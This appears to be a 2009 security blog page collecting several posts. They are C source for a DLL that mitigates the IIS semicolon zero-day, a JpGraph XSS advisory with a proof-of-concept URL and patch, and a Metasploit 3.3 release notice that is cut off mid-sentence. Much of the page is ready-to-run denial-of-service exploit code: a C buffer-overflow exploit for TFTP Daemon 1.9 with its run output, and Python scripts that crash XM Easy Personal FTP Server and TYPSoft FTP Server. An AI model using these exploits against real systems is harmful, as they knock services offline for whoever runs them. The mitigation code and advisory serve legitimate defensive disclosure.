/*
This mitigation should help block attempts to exploit the IIS
semicolon zero-day (BID 37460), but no warranties and no guarantees.
It didn't crash my web servers during testing, but I make no
representations as to how it will or won't perform on anyone else's
web servers. This mitigation is only intended for IIS 4.0, 5.x, and
6.0; IIS 7.0 does not appear to be vulnerable (although in my
testing, IIS 4.0, 5.0, and 5.1 didn't appear to be vulnerable,
either), and 7.5 is also reportedly not vulnerable.
If an attack is blocked, it should show up in the IIS logs with HTTP
status 403 and the made-up substatus 59; for example, on IIS 6.0:
2009-12-27 12:34:56 W3SVC1 169.254.123.200 GET /evil.asp;x.jpg
- 80 - 169.254.123.100 Mozilla/4.0+(compatible;+MSIE+...) 403 59 0
When passed a malformed file name by IIS due to the vulnerability,
most (non-.NET) ISAPI extensions will process the file, including:
asp.dll / asp51.dll: .asa, .asp, .cdx, .cer, .htr
httpodbc.dll: .idc
ssinc.dll: .shtm, .shtml, .stm
So to get the most protection, you'll need to remap the file
extensions for each different ISAPI extension to a different copy of
the mitigation DLL -- it uses the file name with which it loads to
figure out which ISAPI extension it's wrapping. You'll also need to
set up the registry to tell it where to find the ISAPI extension it's
replacing. For example:
[HKEY_LOCAL_MACHINE\SOFTWARE\iissemi1]
"iissemi1_asp.dll" = "C:\WINDOWS\system32\inetsrv\asp.dll"
"iissemi1_ssinc.dll" = "C:\WINDOWS\system32\inetsrv\ssinc.dll"
Try out a malformed file name after deploying to make sure you have
everything set up properly.
Sorry I can't host an installer right now to automate all of this.
Hopefully most people won't need to use this mitigation, but if the
other options for reducing exposure aren't viable in your situation,
I hope this one will be.
-- Derek
P.S. The vulnerability can also be exploited if a subdirectory
containing ".xxx;" can be created; for instance, accessing
"/~y.asp;y/z.jpg" would cause "z.jpg" to be executed by the
ASP ISAPI extension as though it were an ASP script.
*/
////////////////////////////////////////////////////////////////
// iissemi1.cpp
//==============================================================
// Mitigation to prevent processing of file names that contain a
// semicolon or aberrant colon, to guard against the IIS
// semicolon zero-day.
//
// All file extensions that would normally execute an ISAPI
// extension must be manually remapped to a copy of the
// mitigation DLL. The mitigation works by passing requests to
// the original ISAPI extension unless they contain a semicolon
// or improper colon. It is hard-coded to track down asp.dll
// and a few other DLLs, if the mitigation DLL itself loads with
// a file name that indicates which ISAPI extension it's
// replacing; to override this default behavior, or to support
// an unrecognized ISAPI extension, add a registry value
// matching the mitigation DLL's file name in the
// "HKEY_LOCAL_MACHINE\SOFTWARE\iissemi1" registry key.
//
// To build:
//
// 1. Start Visual Studio 2008 (2005 should also work)
// 2. File -> New -> Project
// 3. Choose Visual C++: Win32: Win32 Project
// 4. Enter "iissemi1" for the name
// 5. In the Win32 Application Wizard, choose an
// "Application type" of "DLL", and under "Additional
// options", check "Empty project"
// 6. In the Solution Explorer, right-click on "Source Files",
// Add -> New Item
// 7. Choose "C++ File (.cpp)" and enter "iissemi1.cpp" for
// the name
// 8. Paste all of this source code into the new .cpp file
// 9. In the Solution Explorer, right-click again on "Source
// Files", Add -> New Item
// 10. Choose "Module-Definition File (.def)" and enter
// "iissemi1.def" for the name
// 11. Paste everything in the block comment below (between the
// rows of ****'s) into the new .def file
// 12. Build -> Configuration Manager; for "Active solution
// configuration", choose "Release"
// 13. For maximum portability, Project -> Properties,
// Configuration Properties: C/C++: Code Generation: set
// "Runtime Library" to "Multi-threaded (/MT)"; this will
// keep iissemi1.dll from requiring MSVCR*.DLL
// 14. (While you're in there, Project -> Properties,
// Configuration Properties: Linker: Input, and make sure
// that "Module Definition File" contains "iissemi1.def")
// 15. Build -> Build Solution
//
// To use:
//
// 16. Open Internet Information Services Manager MMC snap-in
// (run "inetmgr")
// 17. Right-click on "Web Sites" or machine node, Properties
// (Master Properties: Edit, as applicable)
// 18. Home Directory tab, Configuration
// 19. Copy iissemi1.dll to a different file name for each
// distinct ISAPI extension you need to replace; e.g.,
// "iissemi1_asp.dll" if you need to replace "asp.dll",
// "iissemi1_httpodbc.dll" for "httpodbc.dll", etc.
// 20. Remap the file extensions for every ISAPI extension which
// you wouldn't want users to be able to supply with
// arbitrary files, to instead use a copy of iissemi1.dll.
// Make sure to keep a record of each mapping changed, so
// that you can easily reverse the changes later.
// (Note that you might get "requested resource is in use"
// errors if you don't remap every file extension belonging
// to an ISAPI extension -- e.g., if you remap ".asp" but
// not ".asa", you might get HTTP 500 errors when you
// access an ASA file.)
// 21. IIS 6.0: In the IIS Manager, go to the "Web Service
// Extensions" folder, Action -> Add a new web service
// extension, enter "iissemi1" for the extension name, add
// each file created in Step 19 to the "Required files"
// list, check "Set extension status to Allowed", OK
// 22. In Regedit, create the registry key
// "HKEY_LOCAL_MACHINE\SOFTWARE\iissemi1"
// 23. In this new key, create string (REG_SZ or REG_EXPAND_SZ)
// registry values named after the copies of iissemi1.dll
// created in Step 19. The data of each registry value
// should be the full path and file name of the ISAPI
// extension that was replaced; e.g., set the value named
// "iissemi1_asp.dll" to
// "C:\WINDOWS\system32\inetsrv\asp.dll", set the value named
// "iissemi1_httpodbc.dll" to
// "C:\WINDOWS\system32\inetsrv\httpodbc.dll", etc.
// 24. Restart W3SVC (run "iisreset")
//
// To uninstall, remap the file extension mappings changed in
// Step 20 back to their original executable paths.
//
// NO WARRANTIES. Use at your own risk. Redistribution of this
// source code in its original, unmodified form is permitted.
//
// Copyright (C) Derek Soeder - 12/27/2009
////////////////////////////////////////////////////////////////
/**** Paste the following into a new .def file: *************
LIBRARY "iissemi1.dll"
EXPORTS
AspStatusHtmlDump
DllCanUnloadNow PRIVATE
DllGetClassObject PRIVATE
DllRegisterServer PRIVATE
DllUnregisterServer PRIVATE
GetExtensionVersion
HttpExtensionProc
TerminateExtension
***************************************************************/
#define WIN32_LEAN_AND_MEAN
#define _CRT_SECURE_NO_WARNINGS
#include
#include
#include
#include
////////////////////////////////////////////////////////////////
// Original ISAPI wrapper
////////////////////////////////////////////////////////////////
WCHAR g_wszMyself[1024];
CRITICAL_SECTION g_csWrappers;
HMODULE g_hmISAPI;
WCHAR g_wszISAPI[1024];
typedef BOOL (WINAPI * PFNASPSTATUSHTMLDUMP)( PVOID, PVOID );
typedef HRESULT (STDAPICALLTYPE * PFNDLLREGISTERSERVER)();
typedef HRESULT (STDAPICALLTYPE * PFNDLLUNREGISTERSERVER)();
PFNASPSTATUSHTMLDUMP g_pfnAspStatusHtmlDump;
LPFNCANUNLOADNOW g_pfnDllCanUnloadNow;
LPFNGETCLASSOBJECT g_pfnDllGetClassObject;
PFNDLLREGISTERSERVER g_pfnDllRegisterServer;
PFNDLLUNREGISTERSERVER g_pfnDllUnregisterServer;
PFN_GETEXTENSIONVERSION g_pfnGetExtensionVersion;
PFN_HTTPEXTENSIONPROC g_pfnHttpExtensionProc;
PFN_TERMINATEEXTENSION g_pfnTerminateExtension;
const struct { void * ppfn; const char * sz; } LOOKUP[] =
{
{ &g_pfnAspStatusHtmlDump, "AspStatusHtmlDump" },
{ &g_pfnDllCanUnloadNow, "DllCanUnloadNow" },
{ &g_pfnDllGetClassObject, "DllGetClassObject" },
{ &g_pfnDllRegisterServer, "DllRegisterServer" },
{ &g_pfnDllUnregisterServer, "DllUnregisterServer" },
{ &g_pfnGetExtensionVersion, "GetExtensionVersion" },
{ &g_pfnHttpExtensionProc, "HttpExtensionProc" },
{ &g_pfnTerminateExtension, "TerminateExtension" }
} ;
BOOL read_reg_path(
LPCWSTR wszKeyName,
LPCWSTR wszValueName )
{
HKEY hkey;
DWORD dwtype, cb, cwch;
WCHAR wsz[ sizeof(g_wszISAPI) /
sizeof(g_wszISAPI[0]) ];
if ( RegOpenKeyExW( HKEY_LOCAL_MACHINE, wszKeyName, 0,
KEY_READ, &hkey ) != ERROR_SUCCESS )
{
return FALSE;
}
cb = (sizeof(g_wszISAPI) - sizeof(g_wszISAPI[0]));
if (RegQueryValueExW( hkey, wszValueName, NULL, &dwtype,
(LPBYTE)g_wszISAPI, &cb ) != ERROR_SUCCESS ||
cb < sizeof(g_wszISAPI[0]) ||
cb > (sizeof(g_wszISAPI) - sizeof(g_wszISAPI[0])) )
{
RegCloseKey( hkey );
return FALSE;
}
RegCloseKey( hkey );
g_wszISAPI[cb / sizeof(g_wszISAPI[0])] = L'\0';
if (dwtype == REG_EXPAND_SZ)
{
cwch = ExpandEnvironmentStringsW( g_wszISAPI,
wsz, ((sizeof(wsz) / sizeof(wsz[0])) - 1) );
if ( cwch == 0 ||
cwch >= (sizeof(wsz) / sizeof(wsz[0])) - 1)
{
return FALSE;
}
wsz[cwch] = L'\0';
memcpy( g_wszISAPI,
wsz, ((cwch + 1) * sizeof(g_wszISAPI[0])) );
}
else if (dwtype != REG_SZ)
return FALSE;
return TRUE;
} //read_reg_path
const wchar_t * __wcsstri(
const wchar_t * _Str,
const wchar_t * _SubStr )
{
size_t cwchstr, cwchsub;
cwchstr = wcslen( _Str );
cwchsub = wcslen( _SubStr );
if (cwchstr < cwchsub)
return 0;
for (cwchstr -= cwchsub; ; cwchstr--, _Str++)
{
if (_wcsnicmp( _Str, _SubStr, cwchsub ) == 0)
return _Str;
if (cwchstr == 0) break;
}
return 0;
} //__wcsstri
BOOL try_defaults(
LPCWSTR wszMyFileName )
{
LPCWSTR wszdll;
if (__wcsstri( wszMyFileName, L"asp51" ))
{
if ( read_reg_path( L"SOFTWARE\\Classes\\CLSID\\"
L"{D97A6DA0-A861-11cf-93AE-00A0C90C2BD8}\\"
L"InprocServer32", NULL ) )
{
return TRUE;
}
wszdll = L"\\asp51.dll";
}
else if (__wcsstri( wszMyFileName, L"asp" ))
{
if ( read_reg_path( L"SOFTWARE\\Classes\\CLSID\\"
L"{D97A6DA0-A861-11cf-93AE-00A0C90C2BD8}\\"
L"InprocServer32", NULL ) )
{
return TRUE;
}
wszdll = L"\\asp.dll";
}
else if (__wcsstri( wszMyFileName, L"httpodbc" ))
wszdll = L"\\httpodbc.dll";
else if (__wcsstri( wszMyFileName, L"ssinc" ))
wszdll = L"\\ssinc.dll";
else if (__wcsstri( wszMyFileName, L"urlauth" ))
wszdll = L"\\urlauth.dll";
else if (__wcsstri( wszMyFileName, L"w3isapi" ))
wszdll = L"\\w3isapi.dll";
else return FALSE;
if ( read_reg_path( L"SOFTWARE\\Microsoft\\InetStp",
L"InstallPath" ) &&
( (sizeof(g_wszISAPI) / sizeof(g_wszISAPI[0])) -
wcslen( g_wszISAPI ) ) > (wcslen( wszdll ) + 1) )
{
wcscat( g_wszISAPI, wszdll );
return TRUE;
}
g_wszISAPI[0] = L'\0';
return FALSE;
} //try_defaults
BOOL load_isapi()
{
LPCWSTR wcp;
size_t i;
EnterCriticalSection( &g_csWrappers );
__try
{
if (g_hmISAPI != NULL)
return TRUE;
wcp = wcsrchr( g_wszMyself, L'\\' );
if (wcp) wcp++; else wcp = g_wszMyself;
if (!read_reg_path( L"SOFTWARE\\iissemi1", wcp ))
{
if (!try_defaults( wcp ))
return FALSE;
}
g_hmISAPI = LoadLibraryW( g_wszISAPI );
if (g_hmISAPI == NULL) return FALSE;
for ( i = 0;
i < (sizeof(LOOKUP) / sizeof(LOOKUP[0])); i++ )
{
*(void * *)(LOOKUP[i].ppfn) =
(void *)GetProcAddress(
g_hmISAPI, LOOKUP[i].sz );
}
}
__finally
{
LeaveCriticalSection( &g_csWrappers );
}
return TRUE;
} //load_isapi
////////////////////////////////////////////////////////////////
// ISAPI extension replacement exports
////////////////////////////////////////////////////////////////
BOOL WINAPI AspStatusHtmlDump(
PVOID pArg0,
PVOID pArg1 )
{
if (!load_isapi() || g_pfnAspStatusHtmlDump == NULL)
return FALSE;
return g_pfnAspStatusHtmlDump( pArg0, pArg1 );
} //AspStatusHtmlDump
STDAPI DllCanUnloadNow()
{
if (!load_isapi() || g_pfnDllCanUnloadNow == NULL)
return S_OK;
return g_pfnDllCanUnloadNow();
} //DllCanUnloadNow
STDAPI DllGetClassObject(
REFCLSID rclsid,
REFIID riid,
LPVOID * ppv )
{
if (!load_isapi() || g_pfnDllGetClassObject == NULL)
return E_UNEXPECTED;
return g_pfnDllGetClassObject( rclsid, riid, ppv );
} //DllGetClassObject
STDAPI DllRegisterServer()
{
if (!load_isapi() || g_pfnDllRegisterServer == NULL)
return E_UNEXPECTED;
return g_pfnDllRegisterServer();
} //DllRegisterServer
STDAPI DllUnregisterServer()
{
if (!load_isapi() || g_pfnDllUnregisterServer == NULL)
return E_UNEXPECTED;
return g_pfnDllUnregisterServer();
} //DllUnregisterServer
BOOL WINAPI GetExtensionVersion(
HSE_VERSION_INFO * pVer )
{
if (!load_isapi() || g_pfnGetExtensionVersion == NULL)
return FALSE;
return g_pfnGetExtensionVersion( pVer );
} //GetExtensionVersion
DWORD WINAPI HttpExtensionProc(
EXTENSION_CONTROL_BLOCK * pECB )
{
HSE_CUSTOM_ERROR_INFO hseerr;
BOOL fdanger;
const char * cp;
if (!load_isapi() || g_pfnHttpExtensionProc == NULL)
return HSE_STATUS_ERROR;
if (pECB != NULL && pECB->lpszPathTranslated != NULL)
{
fdanger = FALSE;
if (strchr( pECB->lpszPathTranslated, ';' ))
fdanger = TRUE;
#if 1 // also check for colon that doesn't belong
cp = pECB->lpszPathTranslated;
if ( cp[0] == '\\' && cp[1] == '\\' &&
(cp[2] == '.' || cp[2] == '?') &&
cp[3] == '\\' && cp[4] != '\0' && cp[5] == ':' )
{
cp += 6;
}
else if ( cp[0] == '\\' && cp[1] == '?' &&
cp[2] == '?' && cp[3] == '\\' &&
cp[4] != '\0' && cp[5] == ':' )
{
cp += 6;
}
else if (cp[0] != '\0' && cp[1] == ':')
{
cp += 2;
}
if (strchr( cp, ':' ))
fdanger = TRUE;
#endif
if (fdanger)
{
if (pECB->ServerSupportFunction != NULL)
{
pECB->ServerSupportFunction(
pECB->ConnID,
HSE_REQ_SEND_RESPONSE_HEADER,
"403 Forbidden",
NULL, NULL );
hseerr.pszStatus = "403 Forbidden";
hseerr.uHttpSubError = 59;
pECB->ServerSupportFunction(
pECB->ConnID,
HSE_REQ_SEND_CUSTOM_ERROR,
&hseerr, NULL, NULL );
} //if(pECB->ServerSupportFunction)
pECB->dwHttpStatusCode = 403;
return HSE_STATUS_SUCCESS;
} //if(fdanger)
} //if(pECB&&pECB->lpszPathTranslated)
return g_pfnHttpExtensionProc( pECB );
} //HttpExtensionProc
BOOL WINAPI TerminateExtension(
DWORD dwFlags )
{
if (!load_isapi() || g_pfnTerminateExtension == NULL)
return FALSE;
return g_pfnTerminateExtension( dwFlags );
} //TerminateExtension
////////////////////////////////////////////////////////////////
// DLL initialization
////////////////////////////////////////////////////////////////
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved )
{
DWORD cwch;
if (fdwReason == DLL_PROCESS_ATTACH)
{
cwch = GetModuleFileNameW( hinstDLL, g_wszMyself,
( ( sizeof(g_wszMyself) /
sizeof(g_wszMyself[0]) ) - 1 ) );
if ( cwch == 0 ||
cwch >= ( ( sizeof(g_wszMyself) /
sizeof(g_wszMyself[0]) ) - 1 ) )
{
return FALSE;
}
InitializeCriticalSection( &g_csWrappers );
g_hmISAPI = NULL;
g_wszISAPI[0] = L'\0';
}
else if (fdwReason == DLL_PROCESS_DETACH)
{
// do this in TerminateExtension?
//if (g_hmISAPI != NULL)
//{
// FreeLibrary( g_hmISAPI );
// g_hmISAPI = NULL;
//}
DeleteCriticalSection( &g_csWrappers );
}
return TRUE;
} //DllMain
Tuesday, December 29, 2009
Code to mitigate IIS semicolon zero-day
Thursday, December 24, 2009
XSS Vulnerability in JpGraph 3.0.6
XSS Vulnerability in JpGraph 3.0.6
Discovered by Martin Barbella
Description of Vulnerability:
-----------------------------
JpGraph is an object oriented library for PHP that can be used to create
various types of graphs which also contains support for client side
image maps.
The GetURLArguments function for the JpGraph's Graph class does not
properly sanitize the names of get and post variables, leading to a
cross site scripting vulnerability.
Systems affected:
-----------------
This has been confirmed in version 3.0.6 of JpGraph's free release.
Previous versions and the professional versions may be affected as well.
Impact:
-------
When a user is tricked into clicking on a malicious link or submitting a
specially crafted form, the injected code travels to the vulnerable web
server, which reflects the attack back to the user’s browser. The
browser then executes the code because it came from a "trusted" server.
(From OWASP: http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29)
Mitigating factors:
-------------------
The vulnerability seems to be exploitable only in cases where client
side image maps are used.
Proof of concept:
-----------------
This can be demonstrated in the csim_in_html_ex1.php example provided
with jpgraph (as well various other csim examples) as shown below.
http://site/csim_in_html_ex1.php?"/>=arbitrary
Solution:
---------
The following patch can be applied to jpgraph.php to correct the
vulnerability.
--- jpgraph.php.orig 2009-11-14 14:45:01.000000000 -0500
+++ jpgraph.php 2009-11-14 14:55:34.000000000 -0500
@@ -1286,11 +1286,11 @@
while( list($key,$value) = each($_GET) ) {
if( is_array($value) ) {
foreach ( $value as $k => $v ) {
- $urlarg .= '&'.$key.'%5B'.$k.'%5D='.urlencode($v);
+ $urlarg .=
'&'.urlencode($key).'%5B'.urlencode($k).'%5D='.urlencode($v);
}
}
else {
- $urlarg .= '&'.$key.'='.urlencode($value);
+ $urlarg .= '&'.urlencode($key).'='.urlencode($value);
}
}
@@ -1301,11 +1301,11 @@
while( list($key,$value) = each($_POST) ) {
if( is_array($value) ) {
foreach ( $value as $k => $v ) {
- $urlarg .= '&'.$key.'%5B'.$k.'%5D='.urlencode($v);
+ $urlarg .=
'&'.urlencode($key).'%5B'.urlencode($k).'%5D='.urlencode($v);
}
}
else {
- $urlarg .= '&'.$key.'='.urlencode($value);
+ $urlarg .= '&'.urlencode($key).'='.urlencode($value);
}
}
Continue...
Wednesday, December 23, 2009
Remote Buffer Overflow Exploit (TFTP Daemon Version 1.9) by Socket_0x03
//################################################
//
//Vulnerability: Remote Buffer Overflow Exploit
//Impact: Remote Denial of Service Attack
//Vulnerable Application: TFTP Daemon Version 1.9
//Tested on Windows XP Service Pack II
//
//Author: Socket_0x03
//Contact: Socket_0x03@teraexe.com
//Website: www.teraexe.com
//
//################################################
#include
#include
#pragma comment(lib, "ws2_32.lib")
char Buffer_Overflow[] =
"\x00\x02"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes...
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\0"
"netascii"
"\0";
void main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
SOCKET mysocket;
int destPORT = 69;
if (argc < 2){
printf("\nVulnerability: Remote Buffer Overflow Exploit\n");
printf("Impact: Remote Denial of Service Attack\n");
printf("Vulnerable Application: TFTP Daemon Version 1.9\n");
printf("\nAuthor: Socket_0x03\n");
printf("Contact: Socket_0x03@teraexe.com\n");
printf("Website: www.teraexe.com\n");
printf("\nUsage: exploit + IP Address\n");
printf("Example: exploit 192.168.1.100\n");
return;
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) {
printf("No winsock suitable version found!");
return;
}
mysocket = socket(AF_INET, SOCK_DGRAM , 0);
if(mysocket==INVALID_SOCKET){
printf("Error: Cannot create a socket.\n");
exit(1);
}
printf("Resolving IP Address.\n");
if ((pTarget = gethostbyname(argv[2])) == NULL){
printf("Error: Resolve of %s failed.\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(destPORT);
printf("Connecting to Daemon 1.9\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
printf("Error: Could not connect to TFTP Daemon\n");
exit(1);
}
printf("Connection Completed.\n");
Sleep(10);
printf("Sending packet.\n");
if (send(mysocket,Buffer_Overflow, sizeof(Buffer_Overflow)+1, 0) == -1){
printf("Error sending packet.\n");
closesocket(mysocket);
exit(1);
}
printf("Remote Buffer Overflow Completed.\n");
closesocket(mysocket);
WSACleanup();
}
/*
Microsoft Windows XP [VersiĆ³n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>exploit
Vulnerability: Remote Buffer Overflow Exploit
Impact: Remote Denial of Service Attack
Vulnerable Application: TFTP Daemon Version 1.9
Author: Socket_0x03
Contact: Socket_0x03@teraexe.com
Website: www.teraexe.com
Usage: exploit + IP Address
Example: exploit 192.168.1.100
C:\>exploit 192.168.1.101
Resolving IP Address.
Connecting to Daemon 1.9
Connection Completed.
Sending packet.
Remote Buffer Overflow Completed.
C:\>
*/
Continue...
Tuesday, November 24, 2009
XM Easy Personal FTP Server Remote DoS Vulnerability
Date of Discovery: 24-Nov-2009
Credits:leinakesi[at]gmail.com
Vendor: Dxmsoft
*******************************************************************************
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
*******************************************************************************
Overview:
XM Easy Personal FTP Server failed to handle more than 2000 files or folders in
the root directory.
*******************************************************************************
Details:
if you could log on the server, take the following steps and the server will
crash which lead to DoS.
1.upload 2000 files or folders.
2.close the current connection.
3.use a ftp client to reconnect the server.
user ...
pass ...
port ...
list ...
crash!!!!!!
*******************************************************************************
Exploit example:
1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string='a'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
for i in range(1,200):
sock.send("mkd " + "a" * i +"\r\n")
print "[-] " + ("mkd " + "a" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "b" * i +"\r\n")
print "[-] " + ("mkd " + "b" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "c" * i +"\r\n")
print "[-] " + ("mkd " + "c" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "d" * i +"\r\n")
print "[-] " + ("mkd " + "d" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "e" * i +"\r\n")
print "[-] " + ("mkd " + "e" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "f" * i +"\r\n")
print "[-] " + ("mkd " + "f" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "g" * i +"\r\n")
print "[-] " + ("mkd " + "g" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "h" * i +"\r\n")
print "[-] " + ("mkd " + "h" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "i" * i +"\r\n")
print "[-] " + ("mkd " + "i" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "j" * i +"\r\n")
print "[-] " + ("mkd " + "j" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
sock.close()
sys.exit(0);
2.use a ftp client to reconnect the server
for example:
start->run->cmd->ftp 127.0.0.1->*****->*****->dir
TYPSoft FTP Server 'APPE' and 'DELE' Commands Remote DoS Vulnerabilities
Date of Discovery: 24-Nov-2009
Credits:leinakesi[at]gmail.com
Vendor: TYPSoft
Affected:
TYPSoft FTP Server Version 1.10
Earlier versions may also be affected
Overview:
TYPSoft FTP Server is an easy use FTP server Application. Denial of Service vulnerability exists in TYPSoft FTP Server when
"APPE" and "DELE" commands are used in the same socket connection.
Details:
If you could log on the server successfully, take the following steps and the ftp server will crash which would lead to
Denial of Service attack:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.send("DELE "+ test_string +"\r\n")
7.sock.close()
Severity:
High
Exploit example:
#!/usr/bin/python
import socket
import sys
import time
def Usage():
print ("Usage: ./expl.py
print ("Example:./expl.py 127.0.0.1 127.0.0.1 anonymous anonymous\n")
print ("Example:./expl.py 192.168.48.183 192.168.48.111 anonymous anonymous\n")
if len(sys.argv) <> 5:
Usage()
sys.exit(1)
else:
local=sys.argv[1]
hostname=sys.argv[2]
username=sys.argv[3]
passwd=sys.argv[4]
test_string="a"*30
ip_every=local.split('.')
for i in range(1,10000):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r
sock_data.bind((local,31339))
sock_data.listen(1)
sock.send("PORT " + ip_every[0] +","+ ip_every[1] +","+ ip_every[2] +"," + ip_every[3] + ",122,107\r\n")
print "[-] "+ ("PORT " + local + "122,107\r\n")
r=sock.recv(1024)
print "[+] "+ r
sock.send("APPE "+ test_string +"\r\n")
print "[-] "+ ("APPE "+ test_string +"\r\n")
r=sock.recv(1024)
print "[+] "+ r
sock.send("DELE "+ test_string +"\r\n")
print "[-] "+ ("DELE "+ test_string +"\r\n")
r=sock.recv(1024)
print "[+] "+ r
sock.close()
sock_data.close()
time.sleep(2)
sys.exit(0);
Tuesday, November 17, 2009
Metasploit Framework 3.3 Released
We are excited to announce the immediate availability of version 3.3 of
the Metasploit Framework. This release includes 446 exploits, 216
auxiliary modules, and hundreds of payloads, including an in-memory VNC
service and the Meterpreter. In addition, the Windows payloads now
support NX, DEP, IPv6, and the Windows 7 platform. More than 180 bugs
were fixed since last year’s release of version 3.2, making this one of
the more well-tested releases yet.
- http://www.metasploit.com/framework/download/
Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used on
a wide range of hardware platforms, from massive Unix mainframes to the
Apple® iPhone™. Installers are available for the Windows and Linux
platforms, bundling all dependencies into a single package for ease of
installation. The latest version of the Metasploit Framework, as well as
images, video demonstrations, documentation and installation
instructions for many platforms, can be found online at
http://www.metasploit.com/framework/.
This release of the Metasploit Framework was driven by numerous key
contributors, including James Lee, Yoann Guillot, Steve Tornio, MC,
Chris Gates, Alexander Kornbrust, Ramon Carvalle, Stephen Fewer, Ryan
Linn, Lurene Grenier, Mike Kershaw, Patrick Webster, Max Moser, Efrain
Torres, Alexander Sotirov, Ty Bodell, Joshua Drake, JR, Carlos Perez,
Kris Katterjohn and many others.
The startup speed up the Metasploit Console and all utilities has been
greatly improved due to performance patches by Yoann Guillot and a
string processing overhaul by James Lee. Metasploit now fully supports
the 1.9.1 version of the Ruby interpreter, clearing the way for support
under a variety of alternate Ruby VMs in the future.
The Windows installation now includes a fully-functional console
interface, using Cygwin and RXVT as a front-end to the framework. The
Windows installer now runs on all supported versions of Windows, from
Windows 2000 to Windows 7. The Windows version of Metasploit is now
portable and can be silently installed via the /S /D=Dest parameters.
The Linux installers now include everything needed to run the Metasploit
Framework on most versions of Linux released over the last five years.
The official Linux installers are recommended for anyone using a Linux
distribution other than Ubuntu (8.04+). These installers include Ruby
1.9.1, Subversion 1.6.6, and all dependencies, along with convenient
scripts for keeping the framework updated.
The Metasploit Console now indicates how many days have passed since the
last update, reminding users when their installation becomes out of
date. The console now uses a Ruby implementation of the Readline library
